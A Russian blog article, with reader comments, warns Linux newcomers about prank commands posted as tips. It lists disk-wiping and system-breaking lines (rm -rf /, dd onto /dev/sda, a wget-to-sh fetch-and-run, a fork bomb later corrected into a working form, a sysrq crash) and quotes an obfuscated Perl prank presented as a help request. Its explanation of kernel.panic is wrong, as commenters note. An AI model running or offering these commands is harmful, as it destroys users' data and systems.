Опасные шутки с Linux: какие команды нельзя вводить никогда

Линуксоиды — народ веселый. Мы любим пошутить. К сожалению, некоторые шутки над новичками в Linux иногда заканчиваются уничтожением системы и потерпевшему уже не до смеха. Как не попасться на вредоносный розыгрыш?

Опасные команды в Linux

Какова принципиальная схема розыгрыша? Начинающий пользователь читает на форуме совет из серии «Как ускорить Linux ровно в 100 раз». В теле комментария содержатся непонятные строчки, которые нужно вписать в терминале. Пользователь копипастит рецепт и его компьютер подрывается на мине. Но что же делать, если ускорить Linux в 100 раз хочется, а потерять данные — нет? Нужно просматривать код на наличие следующих убийственных команд:


mv / /dev/null

Команда переносит содержимое жесткого диска в черную дыру. Эквивалент rm -rf /


rm -rf /

Удаление всего на диске. На самом деле, команда сразу не сработает — сначала задаст пользователю вопрос на английском. Но что делает, скажем, пользователь Linux Mint с вопросами на английском? Жмет «y». Если использовать опцию «--no-preserve-root», то вывод вопроса будет подавлен.

Что на самом деле делает команда «rm -rf /»?


wget http://www.example.com/script.txt -O- | sh

С example.com загрузится и сразу же выполнится код, который вы даже не увидите. Очень опасная команда. На нее ведутся даже некоторые опытные линуксоиды, видя домен, который заслуживает доверия. Но не забывайте, что в некоторых случаях пользователи могут загружать на сайт свои файлы. Безопасное расширение txt тоже не должно обманывать, оно тут не при чем. Содержимое текстового файла будет подано на вход sh.


dd if=/dev/random of=/dev/sda

Уничтожит данные на диске, причем гарантированно без возможности восстановления (при условии, что отработает до конца).


:(){:|:&};:

Вилочная бомба. Опасна только на сервере. Команда порождает копии себя до тех пор, пока не закончится ОЗУ. Затем компьютер виснет, но после перезагрузки полностью работоспособен.


rm -f /usr/bin/sudo ; rm -f /bin/su

Не даст получить права root из терминала. Самая безобидная шутка, но на новичков наводит панику. Опытный линуксоид нажмет Ctrl-Alt-F1, спокойно зайдет под root и восстановит sudo и su.

Получаем права администратора без знания root-пароля


dd if=/dev/random of=/dev/port

Запись мусора в порты ввода-вывода. Вызовет панику ядра и зависание. Некоторые пользователи утверждают, что таким образом можно вызвать аппаратную поломку, однако документальных подтверждений этому нет.


echo 1 > /proc/sys/kernel/panic

Корректный вызов паники ядра Linux.


> /dev/sda

Любые комбинации с этой командой критически опасны. echo "Hello!" > /dev/sda испортит разметку диска. Большие фрагменты мусора, отправляемые в /dev/sda уничтожат данные на диске без возможности восстановления специализированными программами.

Комментарии

"echo 1 > /proc/sys/kernel/panic"
это не вызовет kernelpanic, а подождет 1 сек до ребута при kernelpanic

The value given is seconds to wait before rebooting. The default setting is 0, which doesn't cause a reboot. The returned 0 is the time the kernel will wait before it reboots. If it is 0 or lower, it won’t reboot by itself.

так можно повесить линух и то только от рута, c sudo не сработает

echo c > /proc/sysrq-trigger

:(){:|:&};:
-bash: syntax error near unexpected token `{:'
Что я делаю не так?

вот тот же самый рабочий пример из вики, 2 раза систему положил, видимо пробелов не хватало

:(){ :|:& };:

насчет kernelpanic там еще одного вызова не хватает

At this point, you need to test the configured setup – that is, you need to trigger a kernel crash artificially, which should then automatically start a dump write. To do so, use

echo 1 > /proc/sys/kernel/sysrq

to enable the “Magic SysRequest Keys.” Under normal circumstances, this has already happened if you used the distribution tools to set up the kernel dump.

Next, type

echo c > /proc/sysrq-trigger

было приятно положить систему во время опытов, многие советы хацкеров 5-2 летней давности уже не пашут. Я кернелпаник уже года 4 не видел

Интересно, а можно так же угробить Виндовс?

Сидеть из под админа, не ставить обновления безопасности, ставить кряки на софт и систему.
Делают 90% виндузятников.

Это понятно, имелось ввиду из командной строки.

cmd от админа:
del C:\Windows\System32

а это работает? А то иногда когда переустанавливаю систему чтобы не форматировать диск надо старый windows удалить (другие папки просто нужны на диске). Windows же защищала свои файлы от удаления?

Достаточно отключить отключаемые службы, почистить планировщик и поковырять gpedit.msc — после этого в Вантузу почти невозможно работать.

Главное здесь — как раз: поменьше знать (!) Linux!

Главное здесь — как раз: поменьше знать (!) Linux!

? странный вывод. В смысле если не замечать некоторых вещей, то их как-будто нет? :) И потом незнание не освобождает от...

Написано: "здесь", я понимаю, относительно использования ЭТИХ конамд.

Имею как минимум по 2 резервных копии рабочих систем Linux,хотя описанной сдесь фигней не занимаюсь :)

Что значит фигней :). Предупрежден значит вооружен. Если знаешь где может быть проблема, не станешь делать многие ошибки. Или если сделал не будешь смотреть на систему как баран на новые ворота или сразу накатывать резервную копию, а может еще просто что-то исправишь. Постоянное расширение своих знаний — вот что отличает специалиста от лузера

Потестил
rm -f /usr/bin/sudo ; rm -f /bin/su
Смог вернуть скопировав с ливсиди файлы sudo и su.
А как это сделать прямо из системы я хз

Если установлен пароль рута, ивы можете зайти в него с первого терминала, то скорее всего
# apt-get -y install sudo
# apt-get -y install su
Но опять-же только если вы можете зайти в консоль рутом. Например, если у вас Ubuntu и пароля рута по умолчанию нет, то ничего не получится...

# apt-get -y install sudo
# apt-get -y install su

user@debian:~$ apt-cache search ^sudo$
sudo-ldap — Provide limited super user privileges to specific users
sudo — предоставляет ограниченные привилегии суперпользователя указанному пользователю
user@debian:~$ apt-cache search ^su$
user@debian:~$ _
Наверное su как-то по-другому восстанавливается. :)

mv / /dev/null

Я когда-то попробовал mv file /dev/null то-ли на центосе то-ли на опенсусе. Думал файл удалится. Но файл заменил собой устройство null. Пришлось судорожно гуглить как его (null) востановить, пока очень удалённый и очень критичный сервер не перезагрузился, т. к. писали, что без него может не загрузиться.

помогите, пожалуйста исправить такую программу:

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

— не печатает

(c) linux.org.ru

Эх, были времена =))

Как в рут зайти под ктрл+альт+ф.. зайти? в тупую вписать логин root и пароль не получалось вроде

ктрл+альт+ф

Это что такое? Если нужен root, то проще воспользоваться командой su. Сначала sudo passwd, а потом su.

Комментировать

Filtered HTML

  • Доступны HTML теги: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <blockquote> <strike> <code> <h2> <h3> <h4> <h5> <del> <img>
  • Адреса страниц и электронной почты автоматически преобразуются в ссылки.
  • Строки и параграфы переносятся автоматически.

Plain text

  • HTML-теги не обрабатываются и показываются как обычный текст
  • Адреса страниц и электронной почты автоматически преобразуются в ссылки.
  • Строки и параграфы переносятся автоматически.